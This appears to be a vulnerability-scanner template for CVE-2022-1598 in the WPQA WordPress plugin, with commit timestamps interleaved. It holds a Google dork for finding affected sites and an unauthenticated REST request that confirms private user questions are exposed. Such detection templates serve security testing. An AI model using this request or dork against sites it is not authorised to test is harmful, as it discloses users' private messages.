2022-05-30 10:45:32 +00:00
id : CVE-2022-1598
info :
name : WordPress Plugin WPQA < 5.5 - Unauthenticated Private Message Disclosure
author : veshraj
2022-06-16 12:09:31 +00:00
severity : medium
2022-05-30 10:45:32 +00:00
description : |
The plugin which is a companion to the Discy and Himer themes, lacks authentication in a REST API endpoint, allowing unauthenticated users to discover private questions sent between users on the site.
reference :
- https://wpscan.com/vulnerability/0416ae2f-5670-4080-a88d-3484bb19d8c8
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1598
classification :
2022-06-16 12:09:31 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 5.3
2022-05-30 10:45:32 +00:00
cve-id : CVE-2022-1598
2022-06-16 12:09:31 +00:00
cwe-id : CWE-284
2022-05-30 10:45:32 +00:00
metadata :
google-dork : inurl:/wp-content/plugins/wpqa
2022-06-16 12:09:31 +00:00
verified : "true"
2022-08-27 04:41:18 +00:00
tags : cve,cve2022,wordpress,wp-plugin,wpqa,idor,wpscan
2022-05-30 10:45:32 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-json/wp/v2/asked-question'
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"id":'
- '"rendered":'
condition : and
- type : status
status :
- 200